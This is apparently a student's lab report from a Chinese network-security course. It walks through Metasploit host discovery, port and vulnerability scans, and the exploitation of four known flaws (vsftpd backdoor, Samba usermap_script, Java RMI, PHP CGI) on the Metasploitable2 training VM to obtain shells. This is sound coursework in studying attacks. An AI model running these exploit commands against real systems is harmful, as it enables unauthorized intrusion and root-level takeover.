20232301 2025-2026-1 《网络与系统攻防技术》实验六实验报告

实验六 Metasploit攻击渗透实践

一、实验内容

掌握metasploit的用法。
下载官方靶机Metasploitable2,完成下面实验内容。

(1)前期渗透
①主机发现(可用Aux中的arp_sweep,search一下就可以use)
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③选做:也可以扫系统版本、漏洞等。

(2)攻击如下漏洞:
1.sftpd源码包后门漏洞(21端口)
2.SambaMS-RPC Shell命令注入漏洞(端口139)
3.Java RMI SERVER命令执行漏洞(1099端口)
4.PHP CGI参数执行注入漏洞(80端口)

2.实验过程

2.1前期渗透

2.1.1主机发现

使用ifconfig命令查看靶机ip,为192.168.67.130
image

kali中输入msfconsole进入metasploit
输入如下命令:

search arp_sweep  #搜索ARP扫描辅助模块
use 0 #使用第一个模块arp_sweep
set RHOSTS 192.168.67.0/24  #扫描虚拟机所在网段
run  #开始扫描

image
结果如下:
image
我们发现了刚刚安装的靶机的ip地址,也就是说明其在线,同时括号中标识标识为VMware, Inc.表示其为虚拟机

2.1.2端口扫描

(1)使用nmap
nmap -sS -sV 192.168.67.130
对靶机进行SYN端口扫描和版本探测
结果如下:
image
发现了大量端口
(2)使用Metasploit的Portscan模块实现同样功能
输入如下指令:

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.67.130
set THREADS 10   # 设置并发线程数,提升扫描速度
run

结果如下:
image
同样发现了大量端口
其中不乏一些存在漏洞的端口
例如
139 端口(NetBIOS):易遭爆破、SMB漏洞攻击,黑客可尝试爆破并入侵。
445 端口(SMB):存在 “永恒之蓝” 等漏洞,易被黑客利用传播勒索病毒。
3306 端口(MySQL):易受SQL注入、提权、爆破攻击,可能被黑客获取数据库控制权。

2.1.3漏洞扫描

输入
nmap -script=vuln 192.168.67.130进行漏洞扫描
image

发现了海量结果,我们逐一分析一下:
image
这是vsFTPd 2.3.4的后门漏洞,属于高危漏洞,攻击者可输入含 “😃” 的用户名和任意密码,触发漏洞后目标会开启 6200 后门端口,利用该漏洞直接获取目标主机root权限,完全控制服务器,存在文件篡改、数据窃取、植入恶意程序等严重风险

image
image
在25端口,存在如下漏洞:

  • SSL POODLE 漏洞,攻击者可通过中间人攻击利用 SSL3.0的CBC填充缺陷获取明文数据
  • 匿名Diffie-Hellman密钥交换中间人漏洞,使攻击者能主动篡改会话数据,破坏数据机密性和完整性
  • DHE_EXPORT降级漏洞,可让攻击者将 TLS 会话降级为 512 位加密,轻易破解加密流
  • Diffie-Hellman密钥交换组强度不足漏洞,可能会被破解

对于80端口(web服务):
image
image
存在如下漏洞:

  • Slowloris 拒绝服务漏洞(CVE-2007-6750),攻击者可通过保持大量不完整HTTP连接耗尽服务器资源,导致服务不可用
  • 多处SQL 注入漏洞,黑客可注入恶意 SQL 语句窃取数据库数据、篡改内容甚至获取服务器权限
  • CSRF 漏洞,攻击者可诱导用户在已登录状态下执行非本意操作,比如修改密码、提交恶意请求等

对于1099端口:
image
存在Java RMI注册表远程代码执行漏洞,涉及 1099/tcp端口的rmiregistry服务。这是由于RMI 注册表默认配置允许从远程URL加载类,攻击者可利用此特性注入恶意类,实现远程代码执行。

对于5432端口:
image
image
发现了SSL/TLS相关漏洞:

  • CCS注入漏洞
  • Diffie-Hellman密钥交换组强度不足
  • SSL POODLE信息泄露漏洞

对于6667端口(IRC服务):
image

存在UnrealIRCd IRC服务器后门漏洞,这个漏洞是UnrealIRCd被植入后门的版本,攻击者可通过特定指令直接获取服务器shell权限

对于8180端口(Web服务):
image
image
image

8180 端口存在以下漏洞:

  • Slowloris拒绝服务漏洞:攻击者可通过保持大量不完整 HTTP 连接,耗尽服务器资源,导致服务不可用。
  • JSESSIONID HttpOnly标志未设置:多个 /admin路径下的页面会话cookie未设置HttpOnly标志,易被XSS攻击窃取,进而导致会话劫持,攻击者可冒充管理员执行恶意操作。
  • 后台路径暴露:存在多个可能的/admin管理路径,增加了被暴力破解、路径遍历等攻击的风险。

再用Nessus扫一下:
image
image
结果差不多

2.2漏洞利用

2.2.1Vsftpd源码包后门漏洞(21端口)

进入Metasploit,输入如下命令:

use exploit/unix/ftp/vsftpd_234_backdoor  #使用对应漏洞
set RHOST 192.168.67.130 
exploit

image
发现我们成功获取了主机shell,并且是root权限

2.2.2 SambaMS-RPC Shell命令注入漏洞(端口139)

指令:

use exploit/multi/samba/usermap_script 
set RHOST 192.168.67.130
exploit

image
也是非常成功的获取到了shell

2.2.3 Java RMI SERVER命令执行漏洞(1099端口)

输入nmap -p 1099 192.168.67.130用于确认端口是否打开
image
(其实前边已经验证过了)

输入如下命令进行连接:

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.67.130
exploit  
shell

image
连接成功后,输入shell就成功获取到了root权限的shell

2.2.4 PHP CGI参数执行注入漏洞(80端口)

输入命令:

use exploit/multi/http/php_cgi_arg_injection 
set RHOST 192.168.67.130
exploit

image

获取shell成功,但是与前边获取到的root用户不同,这次获取到的用户是www-data,也就是 Linux系统中用于运行Web服务器的默认系统用户

3.问题与解决

本次实验还是非常顺利的,主要还是偏验证性实验,再加上靶机非常给力,所以没啥问题
51WA3_AX0AJ@DFO8LSKKFOA

4.感悟与思考

这次实验比起之前的实验的确轻松了不少,还让我有点不适应,主要是因为整体就是输指令-分析漏洞/验证权限,加上之前的实验已经把很多糟心的问题都排除掉了(比如说Reason:Died这种问题)所以很流畅。而且由于用的是官方提供的靶机,所以也比较好攻击,回想起来之前的实验一些靶机死活都攻击不成功,真是形成了鲜明对比,看来以后这些偏练习、验证性的实验可以现寻找一下有没有已经有预设好的靶机,这样可以少浪费很多时间。
之前我已经使用过了Metasploit,但是这次的一系列实验让我看到了,其对于各个存在的漏洞都有攻击方法。这让我对对这个工具的强大之处又有了更深的认识。
虽然实验做完了,但是最重要的实验要理解每条指令和输出结果的实际意义,才能真正将知识记到心里,总的来说,这次实验令我受益匪浅。

posted on 2025-11-23 10:47  zhmp5  阅读(0)  评论(0)    收藏  举报